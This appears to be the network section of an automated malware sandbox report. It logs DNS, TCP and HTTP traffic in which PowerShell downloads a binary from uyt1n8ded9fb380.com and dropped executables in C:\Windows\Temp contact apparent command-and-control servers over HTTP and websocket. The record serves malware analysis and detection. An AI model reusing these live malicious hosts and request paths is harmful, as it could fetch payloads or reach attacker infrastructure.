                                                                                      Nov 8, 2024 10:48:04.548604012 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.548614979 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.548898935 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.548906088 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.549083948 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.550440073 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.550448895 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.550539970 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.550626993 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.550774097 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.550777912 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.553226948 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.553261042 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.553385019 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.553390980 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.553448915 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.553551912 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.555125952 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.555246115 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.555341005 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.555398941 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.555402994 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.555622101 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.785151005 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.785156965 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.785262108 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.785371065 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.785378933 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.785542011 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.785588026 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.787523031 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.787533045 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.787866116 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.787872076 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.788050890 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.790179014 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.790188074 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.790456057 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.790462971 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.790625095 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.792109966 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.792149067 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.792315006 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.792320967 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.792390108 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.792510033 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.794784069 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.794792891 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.794954062 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.795046091 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.795048952 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.795142889 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.795253992 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.796917915 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.796931028 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.797056913 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.797178030 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.797183990 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.797424078 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.799529076 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.799542904 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.799738884 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.799745083 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.799921036 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.801654100 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.801691055 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.801789999 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.801841974 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.801847935 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.801990986 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:05.026397943 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.026401997 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.026498079 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.026586056 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:05.026595116 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.026788950 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:05.026798010 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.026942968 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:05.028496027 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.028506041 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.028672934 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:05.028723955 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:05.028723955 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:05.028729916 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.029022932 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:05.031220913 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.031249046 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.032464027 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:05.032471895 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.033329964 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.033341885 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.033519030 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:05.033525944 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.034296989 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:05.035893917 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.035903931 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.036616087 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:05.036622047 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.037403107 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:05.037969112 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.037978888 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.038733006 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:05.038742065 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.039386034 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:05.040584087 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.040594101 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.040958881 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:05.040966034 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.041265965 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:05.042515993 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.042526007 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.042804003 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:05.042810917 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.043114901 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:05.045397043 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.045407057 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.045614004 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:05.045623064 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.045847893 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:05.045847893 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:05.047195911 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.047333002 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.047435999 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:05.047506094 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:05.047509909 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:05.047677994 CET49783443192.168.11.30172.67.137.62

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Nov 8, 2024 10:45:43.537909985 CET6109653192.168.11.301.1.1.1
                                                                                      Nov 8, 2024 10:45:43.678774118 CET53610961.1.1.1192.168.11.30

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Nov 8, 2024 10:45:43.537909985 CET192.168.11.301.1.1.10x4857Standard query (0)uyt1n8ded9fb380.comA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Nov 8, 2024 10:45:43.678774118 CET1.1.1.1192.168.11.300x4857No error (0)uyt1n8ded9fb380.com172.67.137.62A (IP address)IN (0x0001)false
                                                                                      Nov 8, 2024 10:45:43.678774118 CET1.1.1.1192.168.11.300x4857No error (0)uyt1n8ded9fb380.com104.21.86.219A (IP address)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • uyt1n8ded9fb380.com
                                                                                      • 23.88.71.29:8000
                                                                                      • 206.206.126.252:8008

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.11.3049776172.67.137.62807664C:\Windows\Temp\svczHost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 8, 2024 10:46:31.931948900 CET78OUTGET /api/check HTTP/1.1
                                                                                      Host: uyt1n8ded9fb380.com
                                                                                      Connection: Keep-Alive
                                                                                      Nov 8, 2024 10:46:32.638510942 CET1289INHTTP/1.1 200 OK
                                                                                      Date: Fri, 08 Nov 2024 09:46:32 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-store,no-cache
                                                                                      Pragma: no-cache
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GCh5Vx62dA46HMX9h33DW%2F4fM9%2BipzeI9aIl4xV9xofwgQDhduNtwwYlXAp4oddLJc1KTphpeLWEqzIZbIf88ydGTzo9sLWAz%2BjVAPtDeqPdxjHg4uFYgL1GkSjPjoAtUvPVmdmDRe6m"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=19197&sent=41785&recv=21271&lost=0&retrans=0&sent_bytes=58394785&recv_bytes=183807&delivery_rate=13463114&cwnd=258&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      X-Powered-By: ARR/3.0
                                                                                      vary: accept-encoding
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8df4a2edfc16638a-ORD
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=132875&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=78&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Raw: 31 36 33 0d 0a 31 37 33 31 30 35 39 31 39 32 7c 46 6a 44 50 6c 4d 4a 6c 59 41 62 42 32 44 33 70 69 6a 55 6b 2b 6e 77 32 50 61 36 42 30 4d 39 39 53 76 4d 6f 4d 42 72 74 6b 50 41 45 72 5a 53 39 4a 6c 65 65 75 63 61 45 5a 6b 35 7a 65 67 6f 4c 71 35 62 36 71 38 6e 6a 53 34 5a 69 6e 42 6b 49 41 76 49 66 44 51 53 6a 64 66 7a 63 61 54 4a 52 32 7a 72 73 68 6a 30 47 6b 64 64 4d 45 37 57 77 44 46 50 2b 45 41 36 46 63 72 39 4c 6b 78 50 53 35 50 49 2b 37 57 36 73 79 47 33 46 56 4a 59 48 34 47 6f 30 64 79 4b 69 50 45 7a 66 61 30 52 4c 45 6d 52 6b 55 34 33 5a 4b 65 76 78 77 77 32 46 71 35 41 55 6f 6f 78 52 45 59 39 59 33 35 6a 78 7a 51 6e 48 67 77 45 4e 2f 79 32 51 72 2f 4b 6f 68 46 43 41 35 35 63 37 74 43 35 69 6b 6d 46 54 36
                                                                                      Data Ascii: 1631731059192|FjDPlMJlYAbB2D3pijUk+nw2Pa6B0M99SvMoMBrtkPAErZS9JleeucaEZk5zegoLq5b6q8njS4ZinBkIAvIfDQSjdfzcaTJR2zrshj0GkddME7WwDFP+EA6Fcr9LkxPS5PI+7W6syG3FVJYH4Go0dyKiPEzfa0RLEmRkU43ZKevxww2Fq5AUooxREY9Y35jxzQnHgwEN/y2Qr/KohFCA55c7tC5ikmFT6
                                                                                      Nov 8, 2024 10:46:32.638513088 CET121INData Raw: 6b 6e 36 72 39 63 30 56 4e 51 54 67 4d 67 58 39 43 41 51 52 48 66 4f 43 67 4f 4b 78 43 38 62 6c 53 4f 63 52 41 70 52 7a 5a 4c 41 35 6c 32 7a 30 6a 38 48 54 30 54 48 39 75 55 51 46 38 6b 53 6e 77 73 47 62 6b 74 37 43 35 33 43 56 50 45 6f 52 6e 32
                                                                                      Data Ascii: kn6r9c0VNQTgMgX9CAQRHfOCgOKxC8blSOcRApRzZLA5l2z0j8HT0TH9uUQF8kSnwsGbkt7C53CVPEoRn2DPHqMynhKbjJ2h26P4qWQNYcH8zzG1GMj6A==
                                                                                      Nov 8, 2024 10:46:32.638513088 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.11.304978023.88.71.2980007372C:\Windows\Temp\myRdpService.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 8, 2024 10:47:42.171005964 CET164OUTGET /client/ws HTTP/1.1
                                                                                      Host: 23.88.71.29:8000
                                                                                      Connection: Upgrade
                                                                                      Upgrade: websocket
                                                                                      Sec-WebSocket-Key: QUkX8Z3rVUCD9OdfWRXOBA==
                                                                                      Sec-WebSocket-Version: 13
                                                                                      Nov 8, 2024 10:47:42.930535078 CET1289INHTTP/1.1 404 Not Found
                                                                                      Cache-Control: private
                                                                                      Upgrade: websocket
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Server: Microsoft-IIS/8.5
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g5dPlBwFblwAGbz4w0jYXFHXanITC3oHmFbGbunGezunV61Ejpc3R%2FOyw2H7sKiDqEO42V83hLCRkJuzsMUVQoz2HyXF6aivaEeU79KM1SsVMbQaC1PVRpxLOZp0vmI83QgN2DcngBZ%2F"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      CF-RAY: 8df4a4a528991e32-FRA
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=14994&sent=1249&recv=541&lost=0&retrans=0&sent_bytes=1128628&recv_bytes=60911&delivery_rate=1839452&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      X-Powered-By: ARR/3.0
                                                                                      Date: Fri, 08 Nov 2024 09:47:42 GMT
                                                                                      Content-Length: 4852
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{marg


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.11.3049781206.206.126.25280087372C:\Windows\Temp\myRdpService.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 8, 2024 10:47:45.270586014 CET168OUTGET /client/ws HTTP/1.1
                                                                                      Host: 206.206.126.252:8008
                                                                                      Connection: Upgrade
                                                                                      Upgrade: websocket
                                                                                      Sec-WebSocket-Key: QGsziKO/v0aFlgtYcf6gBQ==
                                                                                      Sec-WebSocket-Version: 13
                                                                                      Nov 8, 2024 10:47:45.666271925 CET1289INHTTP/1.1 404 Not Found
                                                                                      Cache-Control: private
                                                                                      Upgrade: websocket
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Server: Microsoft-IIS/10.0
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W1MUB39f9r6LQ2YHeab%2FXX25xVfruMpa%2F4XaSPMvuPbqWxeaoZEo5q62WQ7osZ%2FrtbjYF%2BtO%2BUIE5zIUkrPuZuO1vj%2F%2FKkuvudkGkXqT48sApL9JtfQ7MpM7Crx%2Bi9dgmbaufbw5pDq0"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      CF-RAY: 8df4a4b8fcf4819e-SIN
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=7185&sent=495&recv=339&lost=0&retrans=0&sent_bytes=433286&recv_bytes=35809&delivery_rate=7209876&cwnd=254&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      X-Powered-By: ARR/3.0
                                                                                      Date: Fri, 08 Nov 2024 09:47:45 GMT
                                                                                      Content-Length: 4852
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;}


                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                      3192.168.11.304978223.88.71.298000
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 8, 2024 10:47:57.870625973 CET164OUTGET /client/ws HTTP/1.1
                                                                                      Host: 23.88.71.29:8000
                                                                                      Connection: Upgrade
                                                                                      Upgrade: websocket
                                                                                      Sec-WebSocket-Key: HaVAK3cyCkmYclqhWevY7A==
                                                                                      Sec-WebSocket-Version: 13
                                                                                      Nov 8, 2024 10:47:58.622476101 CET1289INHTTP/1.1 404 Not Found
                                                                                      Cache-Control: private
                                                                                      Upgrade: websocket
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Server: Microsoft-IIS/8.5
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rop%2FCed%2FFQGPgIZEk2%2Boqp7AlNkVSh9Zv7BLcpBh3M7N1E1xDUMoXKsx8yzOyTrkOJp0AAeA9xFwdXr9M1ks%2BPS%2Fbh63mQ1A9KS81DKixh%2F0WrqzMqwzf%2F7fmitYlPBFTYMnGtS80aOR"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      CF-RAY: 8df4a5074fc422bd-CDG
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=26042&sent=1084&recv=425&lost=0&retrans=0&sent_bytes=946045&recv_bytes=51116&delivery_rate=711302&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      X-Powered-By: ARR/3.0
                                                                                      Date: Fri, 08 Nov 2024 09:47:57 GMT
                                                                                      Content-Length: 4852
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;}


                                                                                      HTTPS Proxied Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.11.3049751172.67.137.624433340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-08 09:45:43 UTC166OUTGET /ij HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                      Host: uyt1n8ded9fb380.com
                                                                                      Connection: Keep-Alive
                                                                                      2024-11-08 09:45:44 UTC990INHTTP/1.1 200 OK
                                                                                      Date: Fri, 08 Nov 2024 09:45:44 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 6417
                                                                                      Connection: close
                                                                                      cf-cache-status: DYNAMIC
